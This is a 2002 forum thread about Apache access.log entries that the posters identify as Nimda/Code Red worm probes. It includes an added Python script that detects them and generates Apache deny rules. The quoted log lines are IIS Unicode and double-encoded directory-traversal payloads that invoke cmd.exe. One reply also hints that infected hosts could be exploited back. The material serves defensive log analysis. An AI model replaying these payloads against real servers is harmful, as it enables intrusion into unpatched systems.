-
December 1st, 2002, 07:37 PM
#1
apache access.log
So... ah... from the strings I see here from my access log... I'm guessing this was either some skiddie trying to get in or... maybe a virus trying to spread itself... is that an accurate assumption or...?
66.128.109.148 - - [27/Nov/2002:23:20:22 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 278 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:22 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 276 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:23 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:23 -0600] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:24 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:24 -0600] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:25 -0600] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:26 -0600] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:26 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:26 -0600] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:27 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:27 -0600] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:27 -0600] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:28 -0600] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:28 -0600] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:29 -0600] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300 "-" "-"
And is there a way for me to make apache just deny any requests from this other machine? I've found quite a few more and I think another host is actually doing this same routine as we speak.
-
December 1st, 2002, 07:49 PM
#2
Looks VERY much like Nimda/Code red
-
December 1st, 2002, 07:53 PM
#3
Yeah, it's like... I figured it couldn't be a real human hack attempt because of the rate of the URL requests or whatever... there's like two per second sometimes.
Analog = Classical
Digital = Techno
-
December 1st, 2002, 08:55 PM
#4
That's probably one of the Internet worms looking for an unpatched IIS server (commonly Code Red). If you use UNIX, you don't have to worry about these log entries as they don't affect Apache; if you use Windows, make sure you are fully patched.
I have the following lines at the end of my .htaccess file:
-
December 1st, 2002, 09:33 PM
#5
Just for fun, grep | wc -l your access_log and error_log for "cmd.exe" and see how many log entries there are for such IIS hack attempts: it's mind boggling!
On a low-traffic Apache server at work, I get 2712 hits for cmd.exe (log starts June 14)!!
Ammo
Credit travels up, blame travels down -- The Boss
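Added example (not code from anyone in this thread): a small Python script that does what post #1 asks and post #5 suggests, parsing Apache access.log lines, flagging the IIS worm probe requests (cmd.exe / root.exe, including the double-encoded `..%255c..` traversal form), and counting them per source host so the noisy ones can be denied. The sample input reuses four lines quoted in post #1 plus two constructed lines for a second, benign host; the `Deny from` output and the threshold are assumptions, using the mod_access syntax of Apache 1.3/2.2 `.htaccess` files.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote

# Apache common/combined log line: host ident user [time] "request" status bytes ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) ')

# Targets requested by the Nimda / Code Red II family named in this thread.
PROBE_MARKERS = ("cmd.exe", "root.exe")

def parse_line(line):
    """Return {ip, path, status} for one access.log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    req = m.group("req").split()
    path = req[1] if len(req) > 1 else ""
    return {"ip": m.group("ip"), "path": path, "status": int(m.group("status"))}

def is_iis_probe(path):
    """True for worm-style requests; decode twice so '..%255c..' -> '..%5c..' -> '..\\..' is seen."""
    decoded = unquote(unquote(path)).lower()
    return any(marker in decoded for marker in PROBE_MARKERS) or "..\\" in decoded or "../" in decoded

def summarize(lines):
    """Per source IP: number of probe requests and a Counter of the status codes they got."""
    per_ip = defaultdict(lambda: {"probes": 0, "statuses": Counter()})
    for line in lines:
        rec = parse_line(line)
        if rec and is_iis_probe(rec["path"]):
            per_ip[rec["ip"]]["probes"] += 1
            per_ip[rec["ip"]]["statuses"][rec["status"]] += 1
    return dict(per_ip)

def deny_directives(summary, threshold=3):
    """Assumed Apache 1.3/2.2 mod_access lines for hosts at or above the probe threshold."""
    return [f"Deny from {ip}" for ip, s in sorted(summary.items()) if s["probes"] >= threshold]

# Sample input: four lines from post #1, plus two constructed lines for a second host (192.0.2.10).
SAMPLE_LOG = [
    '66.128.109.148 - - [27/Nov/2002:23:20:22 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 278 "-" "-"',
    '66.128.109.148 - - [27/Nov/2002:23:20:24 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300 "-" "-"',
    '66.128.109.148 - - [27/Nov/2002:23:20:27 -0600] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283 "-" "-"',
    '66.128.109.148 - - [27/Nov/2002:23:20:29 -0600] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300 "-" "-"',
    '192.0.2.10 - - [28/Nov/2002:10:00:00 -0600] "GET /index.html HTTP/1.0" 200 1024 "-" "Mozilla/4.0"',
    '192.0.2.10 - - [28/Nov/2002:10:00:05 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-"',
]

if __name__ == "__main__":
    summary = summarize(SAMPLE_LOG)
    for ip, s in summary.items():
        print(f"{ip}: {s['probes']} probe(s), statuses {dict(s['statuses'])}")
    print("\n".join(deny_directives(summary)))
```

On a real log, `summarize(open("access.log"))` gives the same per-host tally; the Apache 2.4 equivalent of `Deny from` is `Require not ip`, so adjust the emitted line to the server version you run.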
-
December 2nd, 2002, 01:37 AM
#6
I'm running it on an XP machine... it's just going to be up for a while to test a website so this client can look at it but... man... I am really surprised how often this is going... it's crazy to see how many times my machine gets hit with that... I thought Code Red and the like were all but gone! Guess not!
Analog = Classical
Digital = Techno
-
December 2nd, 2002, 02:09 PM
#7
Probably someone infected with, as stated before, the Code Red or Nimda virus..
The funny thing is, you can use this against them..
When I was a mere scriptkiddie, I would search my logs for these and the fact is, if they have this worm, they can also be exploited via the Unicode bug
Not that any of us would ever do so.. so you can mail the man/woman behind the IP and tell them they've got a serious problem..
Linux: don't be part of the problem, be part of the solution..
ASCII stupid question, get a stupid ANSI.
When in Russia, pet a PETSCII.
Get your ass over to SLAYRadio the best station for C64 Remixes !